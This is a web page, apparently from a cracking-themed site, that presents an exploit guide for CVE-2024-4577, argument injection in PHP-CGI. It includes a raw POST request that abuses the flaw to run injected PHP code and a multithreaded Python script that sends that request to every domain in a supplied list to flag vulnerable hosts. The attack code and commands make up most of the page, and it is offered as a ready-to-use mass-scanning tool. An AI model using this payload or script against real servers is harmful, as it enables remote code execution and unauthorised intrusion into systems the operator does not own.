Support Crack-Vault and help us keep providing free tools. Every donation counts! (BTC) Address: bc1qhhva8uplmkaa3kkwxnux9t3y6l6kmhnwqzktzn

CVE-2024-4577: Argument Injection in PHP-CGI

groot5t1

CVE-2024-4577 Exploit Guide

How to Run the Python Script

First, let’s save the Python script with the name CVE-2024-4577.py. To run the script:

We need to ensure the requests library is installed. Run the following command:
```
    pip install requests
```
Next, execute the script by passing in the domain list file as an argument:
```
    python CVE-2024-4577.py /path/to/domains-list
```
(Optional) If we only want to display vulnerable hosts, we can run the script with the --quiet flag:
```
    python CVE-2024-4577.py /path/to/domains-list --quiet
```

Proof of Concept (POC) Overview

To manually verify the vulnerability, we can send the following POST request:

POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php phpinfo(); ?>

Nuclei Template for Scanning

A Nuclei template to streamline scanning for vulnerable instances. This template uses the v3 schema and has been verified in a controlled environment:

nuclei -t CVE-2024-4577.yaml -u <target-url>

Exploit.py

import requests
import threading
import sys
import argparse

max_threads = 10
semaphore = threading.Semaphore(max_threads)

def check_vulnerability(domain, quiet):
    url = f"{domain}/test.hello?%25ADd+allow_url_include%3D1+%25ADd+auto_prepend_file%3Dphp://input"
    headers = {
        "User-Agent": "curl/8.3.0",
        "Accept": "*/*",
        "Content-Type": "application/x-www-form-urlencoded",
        "Connection": "keep-alive"
    }
    data = "<?php phpinfo(); ?>"
    if not quiet:
        print(f"[!] Testing {domain}...")
        print("")
    try:
        response = requests.post(url, headers=headers, data=data, timeout=10, verify=False)
        if "PHP Version" in response.text:
            print(f"{domain}: Vulnerable")
        elif not quiet:
            print(f"{domain}: Not Vulnerable")
    except requests.RequestException as e:
        if not quiet:
            print(f"{domain}: Error making request: {e}")
    finally:
        semaphore.release()

def main(file_path, quiet):
    threads = []
    with open(file_path, 'r') as file:
        for line in file:
            domain = line.strip()
            if domain:
                semaphore.acquire()
                thread = threading.Thread(target=check_vulnerability, args=(domain, quiet))
                thread.start()
                threads.append(thread)
    for thread in threads:
        thread.join()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Check for CVE-2024-4577 vulnerability.")
    parser.add_argument("file_path", help="Path to the domain list file")
    parser.add_argument("--quiet", action="store_true", help="Only print if the host is vulnerable")
    args = parser.parse_args()

    main(args.file_path, args.quiet)

📱

Download Now—Top Software, No Cost!